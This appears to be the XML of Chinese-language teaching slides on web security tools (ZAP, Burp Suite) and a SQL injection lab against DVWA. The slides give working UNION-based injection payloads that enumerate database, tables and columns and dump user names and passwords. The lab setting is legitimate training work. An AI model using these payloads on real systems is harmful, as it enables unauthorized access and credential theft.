              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OWASP Zed Attack Proxy攻击代理服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是受欢迎的免费安全工具之一。ZAP可以帮助我们在开发和测试应用程序过程中，自动发现 Web应用程序中的安全漏洞。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>三、Burp Suite</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="457200" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Burp Suite是一个集成化的渗透测试平台，包含了许多工具，可以帮助我们高效地完成对Web应用程序的滲透测试和攻击。</a:t>
            </a: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69608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仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③</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切换到DVWA环境SQL injection模块，点击“Submit”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按钮</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。切换到Burp Suite，可看到拦截了数据包。</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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2682000" y="2945130"/>
            <a:ext cx="6840000" cy="3725037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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36017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mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④</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将id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1 or 1，点击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sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>orward</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sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按钮</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7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2682000" y="2652395"/>
            <a:ext cx="6840000" cy="3725037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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32905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lvl="1"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zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>⑤</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sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>切换到DVWA环境，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>看到</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示全部信息，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，这是</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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入点</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957195" y="2657475"/>
            <a:ext cx="6276975" cy="3486150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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509143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构造完整的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击荷载</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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1371600" lvl="1" indent="-342900" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="600" checksum="3581418924"/>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获取当前数据库名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> union select 1,database()</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1371600" lvl="1" indent="-342900" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="600" checksum="3581418924"/>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获取当前数据库中的表名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> union select 1,table_name from information_schema.tables where table_schema=database()</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1371600" lvl="1" indent="-342900" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="600" checksum="3581418924"/>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获取表中的字段名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> union select 1,column_name from information_schema.columns where table_name=0x7573657273</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1371600" lvl="1" indent="-342900" algn="l" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="600" checksum="3581418924"/>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获取用户名和密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> union select user,password from user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>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【解释】字符串users的十六进制表示是0x7573657273。</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35763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⑦</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直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最后一步，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> union select user,password from user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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1028700" lvl="1" indent="0" algn="l" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2322000" y="2598420"/>
            <a:ext cx="7560000" cy="4016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1247775"/>
            <a:ext cx="10871835" cy="135763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altLang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析medium级别的SQL注入源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101"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）漏洞利用</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0" indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="6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zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，获得用户名和密码。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sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="0" algn="l" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957195" y="2610485"/>
            <a:ext cx="6276975" cy="3486150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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5" name="图片 69"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3043555" y="2237740"/>
            <a:ext cx="5706745" cy="3435350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1247775"/>
            <a:ext cx="10817860" cy="517207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b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、分析high级别的SQL注入源代码</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（1）查看源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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1089640" cy="180975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b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、分析high级别的SQL注入源代码</a:t>
            </a:r>
